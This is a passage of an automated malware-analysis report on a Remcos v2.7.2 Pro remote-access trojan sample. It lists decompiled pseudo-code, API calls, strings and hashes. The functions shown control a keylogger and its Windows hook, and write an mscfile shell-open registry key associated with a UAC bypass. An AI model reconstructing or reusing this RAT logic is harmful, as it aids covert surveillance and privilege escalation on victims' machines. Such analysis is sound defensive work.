					ShowWindow(_t13, 0);
				}
				freopen("CONOUT$", 0x416e44, __imp___iob + 0x20);
				_v1004 = 0;
				memset( &_v1003, 0, 0xf9 << 2);
				asm("stosw");
				asm("stosb");
				_t65 = _t64 | 0xffffffff;
				asm("repne scasb");
				_t40 =  !_t65;
				_t91 = " * Remcos v" - _t40;
				_t41 = _t40 >> 2;
				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
				asm("repne scasb");
				_t47 =  !_t65;
				_t92 = "2.7.2 Pro" - _t47;
				_t34 = _t47;
				asm("repne scasb");
				_t50 = _t34 >> 2;
				memcpy( &_v1004 - 1, _t92, _t50 << 2);
				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
				asm("repne scasb");
				_t56 =  !_t65;
				_t93 = "\n * BreakingSecurity.Net\n\n" - _t56;
				_t36 = _t56;
				asm("repne scasb");
				_t59 = _t36 >> 2;
				memcpy( &_v1004 - 1, _t93, _t59 << 2);
				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
				return printf( &_v1004);
			}



















                                  0x00413d3d
                                  0x00413d49
                                  0x00413d4f
                                  0x00413d57
                                  0x00413d5f
                                  0x00413d63
                                  0x00413d63
                                  0x00413d7c
                                  0x00413d8f
                                  0x00413d95
                                  0x00413d97
                                  0x00413d99
                                  0x00413d9a
                                  0x00413da6
                                  0x00413da8
                                  0x00413db4
                                  0x00413dbe
                                  0x00413dca
                                  0x00413dd3
                                  0x00413dd5
                                  0x00413dd9
                                  0x00413ddd
                                  0x00413de1
                                  0x00413de6
                                  0x00413de9
                                  0x00413df6
                                  0x00413dff
                                  0x00413e01
                                  0x00413e05
                                  0x00413e09
                                  0x00413e0d
                                  0x00413e12
                                  0x00413e15
                                  0x00413e23
                                  0x00413e32

                                  APIs
                                  • AllocConsole.KERNEL32(73B743E0,0041BCB0,00000000), ref: 00413D49
                                  • ShowWindow.USER32(00000000,00000000), ref: 00413D63
                                  • freopen.MSVCRT ref: 00413D7C
                                  • printf.MSVCRT ref: 00413E25
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocConsoleShowWindowfreopenprintf
                                  • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.2 Pro$CONOUT$
                                  • API String ID: 3419900118-1124569734
                                  • Opcode ID: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction ID: e9522ca3004100f4f480c0466296eb3066317ede3a0b8fd360cc0205dee7bfbf
                                  • Opcode Fuzzy Hash: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction Fuzzy Hash: DC213D36B406085BCB29DB7DDCD45EE7A97A7C4251B95827EF80BD73C0DEB08D488644
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E254, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 20%
                                  			E0040E254(void* __eax, void* __eflags) {
				void* _t7;
				void* _t9;
				void* _t28;

				_t33 = __eflags;
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t7 = E0040180C(_t28 - 0x10, __eflags, 0);
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t9 = E0040180C(_t28 - 0x10, _t33, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E0040B8F8(_t33, 0x80000001, _t9, "name", _t9, _t7 + 1, __eax, __eax, 3);
				E004017DD(_t28 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}






                                  0x0040e254
                                  0x0040e25d
                                  0x0040e266
                                  0x0040e273
                                  0x0040e27a
                                  0x0040e286
                                  0x0040e28d
                                  0x0040e29e
                                  0x0040e2aa
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040E25D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E266
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,00000000), ref: 0040E27A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000001), ref: 0040E28D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,00000000), ref: 0040E29E
                                    • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@$??0?$basic_string@?length@?$basic_string@?size@?$basic_string@V01@@
                                  • String ID: name
                                  • API String ID: 4248281052-1579384326
                                  • Opcode ID: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                  • Instruction ID: 9ee346064aa2c941639b0d7d09d57cd35de4d8052a4636764cc5c845d749206a
                                  • Opcode Fuzzy Hash: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                  • Instruction Fuzzy Hash: 6DF01D72A00518DFDB05ABE1EC599FE7768EB94345B00843EE513A70E0EF780905CB5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411AF5, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 34sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00411AF5(void* __ecx, WCHAR* _a4) {
				char _v5;
				char _v6;
				void* _t13;

				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(__ecx);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E0041203B("[ALARM]",  &_v6, "Alarm has been triggered!",  &_v5, _t13);
				PlaySoundW(_a4, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}






                                  0x00411b08
                                  0x00411b1c
                                  0x00411b22
                                  0x00411b41
                                  0x00411b48
                                  0x00411b58

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Alarm has been triggered!,?,?,?,00411AE8,00000000), ref: 00411B08
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ALARM],?), ref: 00411B1C
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00411B31
                                  • PlaySoundW.WINMM(?,00000000), ref: 00411B41
                                  • Sleep.KERNEL32(00002710), ref: 00411B48
                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00411B54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@PlaySoundV10@$?c_str@?$basic_string@HandleLocalModuleSleepTimeV10@0@V10@@printf
                                  • String ID: Alarm has been triggered!$[ALARM]
                                  • API String ID: 4004766653-1190268461
                                  • Opcode ID: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                  • Instruction ID: 5adc9307e5d744e325bca41e58bf78e276225457fadb31193265d37fe82570ce
                                  • Opcode Fuzzy Hash: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                  • Instruction Fuzzy Hash: 09F08971744218BFEA0077A5DC4BFED3E2DEB44741F400025FD01D61D4EAE069408AEA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D8FF, Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E0040D8FF() {
				void* _t10;
				char* _t12;
				int _t13;
				char* _t15;
				signed int _t16;
				char* _t18;
				void* _t41;
				void* _t46;
				intOrPtr _t51;

				_t51 =  *0x41bf20; // 0x0
				 *0x41c119 = 0;
				if(_t51 != 0) {
					E004020F4(_t10, 0x41bf20);
				}
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t46 - 0x10, _t51, 0));
				_t12 = E0040180C(_t46 - 0x10, _t51, 3);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t13 = atoi(_t12);
				E0040F572();
				_t15 = E0040180C(_t46 - 0x10, _t51, 2);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t16 = atoi(_t15);
				_t18 = E0040180C(_t46 - 0x10, _t16, 1);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E0040F5F4(_t41, _t52, atoi(_t18), _t16 & 0xffffff00 | _t16 != 0x00000000, _t13);
				E004017DD(_t46 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}












                                  0x0040d901
                                  0x0040d907
                                  0x0040d90d
                                  0x0040d914
                                  0x0040d914
                                  0x0040d928
                                  0x0040d933
                                  0x0040d93a
                                  0x0040d947
                                  0x0040d94c
                                  0x0040d957
                                  0x0040d95e
                                  0x0040d965
                                  0x0040d973
                                  0x0040d97a
                                  0x0040d985
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D928
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040D93A
                                  • atoi.MSVCRT ref: 0040D947
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D95E
                                  • atoi.MSVCRT ref: 0040D965
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D97A
                                  • atoi.MSVCRT ref: 0040D981
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@$??4?$basic_string@V01@V01@@closesocket
                                  • String ID:
                                  • API String ID: 2234106156-0
                                  • Opcode ID: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                  • Instruction ID: b6bede96aa3c2da0a069e28b117ba5bdb23d63fcfc1ec7a11f567b0dfa856408
                                  • Opcode Fuzzy Hash: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                  • Instruction Fuzzy Hash: 8C111C72A00218DBCB04BBF1EC599EE7769EB94355B00883EE512E71E1EF784909CB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004031F8, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000), ref: 00403224
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040322D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 0040324D
                                    • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00403278
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.ADVAPI32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00403297
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                  • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                  • API String ID: 1883807236-2313358711
                                  • Opcode ID: ae895c2781c4a898e140f451f196115381b04db4d99b7ace2a8ac6b7857622d6
                                  • Instruction ID: 820ff65b2e21daf85941f98613c9b2fccc28e61cad3948ad9cf2f03c1057e28e
                                  • Opcode Fuzzy Hash: ae895c2781c4a898e140f451f196115381b04db4d99b7ace2a8ac6b7857622d6
                                  • Instruction Fuzzy Hash: E1110A72A40554B7DB0267A9DC55BEF7B6DCB85300F0040B6F905A72C1DA780B0647EE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405CCA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 53COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 19%
                                  			E00405CCA(struct HHOOK__** __ecx) {
				char _v5;
				char _v6;
				void* _t9;
				struct HHOOK__* _t16;
				struct HHOOK__** _t30;

				_push(__ecx);
				_t30 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
					_t9 = 0;
				} else {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
					E00405DD3(__ecx);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					E0041203B("[INFO]",  &_v6, "Online Keylogger Stopped",  &_v5, "Online Keylogger Stopped");
					_t30[0xf] = 0;
					_t6 =  &(_t30[0xd]); // 0x0
					_t30[0xa] = 0;
					CloseHandle( *_t6);
					if(_t30[0xf] == 0) {
						_t16 =  *_t30;
						if(_t16 != 0) {
							UnhookWindowsHookEx(_t16);
							 *_t30 = 0;
						}
					}
					_t9 = 1;
				}
				return _t9;
			}








                                  0x00405ccd
                                  0x00405cd0
                                  0x00405cd8
                                  0x00405d49
                                  0x00405cda
                                  0x00405ce9
                                  0x00405cf1
                                  0x00405d00
                                  0x00405d14
                                  0x00405d1a
                                  0x00405d22
                                  0x00405d25
                                  0x00405d28
                                  0x00405d2b
                                  0x00405d34
                                  0x00405d36
                                  0x00405d3a
                                  0x00405d3d
                                  0x00405d43
                                  0x00405d43
                                  0x00405d3a
                                  0x00405d45
                                  0x00405d45
                                  0x00405d4f

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?,?,0040D1F8,0040D2A6,00000001), ref: 00405CE9
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?), ref: 00405D00
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405D14
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • CloseHandle.KERNEL32(00000000), ref: 00405D2B
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 00405D3D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@CloseEventHandleHookUnhookV01@@V10@0@Windowsfreemallocprintfsprintf
                                  • String ID: Online Keylogger Stopped$[INFO]
                                  • API String ID: 2254939683-2146459034
